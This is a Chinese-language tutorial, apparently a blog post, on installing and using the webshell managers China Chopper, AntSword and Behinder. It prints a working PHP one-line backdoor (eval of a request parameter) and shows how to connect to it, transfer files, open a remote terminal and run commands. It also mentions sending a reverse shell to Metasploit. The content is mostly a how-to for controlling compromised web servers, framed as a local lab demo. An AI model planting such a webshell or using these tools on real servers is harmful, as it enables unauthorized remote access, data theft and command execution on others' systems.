中国菜刀
下载链接:https://pan.baidu.com/s/1sR7xSsixIjOSQxJNCAdc_Q 提取码:h8al
打开才到页面如下
首先,我在本地写了个一句话木马
<?php
@eval($_REQUEST['a']);
?>
连接一句话木马步骤
右键-->添加,如下图
a是我们一句话的密码
连接成功如下图:
在此处我们可以进行上传和下载文件
怎么打开终端呢?
在首页位置,右键我们的webshell,点击虚拟终端
我这里是直接有所有文件的权限,没给phpstudy设置权限
中国蚁剑
源码下载地址:https://github.com/AntSwordProject/antSword
加载器下载地址:https://github.com/AntSwordProject/AntSword-Loader
安装
我们先解压加载器,双击"AntSword.exe";
第一次安装项目需要先初始化,如果你已经下载了核心源码,就选择项目源码的文件夹。(如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码)
等初始化完成后,再双击“AntSword.exe”即可正常启动
使用
添加一个新的分类,如下
接下来我们可以采用最简单的连接方式
在下面是设置编码器,默认是明文传输
然后点击测试连接,或者直接添加也行,连接成功如下
可以直接右键打开终端,如下
冰蝎
下载地址:https://github.com/rebeyond/Behinder/releases
运行环境:jre6~jre8:https://www.java.com
Java环境变量:https://blog.csdn.net/hai1991yu/article/details/80920134
也可以选择只安装jre
将下载后的文件解压
直接双击运行jar文件
右键新增,这里面我们使用冰蝎自带的shell.php
这里抛出一个探针,如下
命令执行
文件目录
还可以反弹shell到msf,自行发掘吧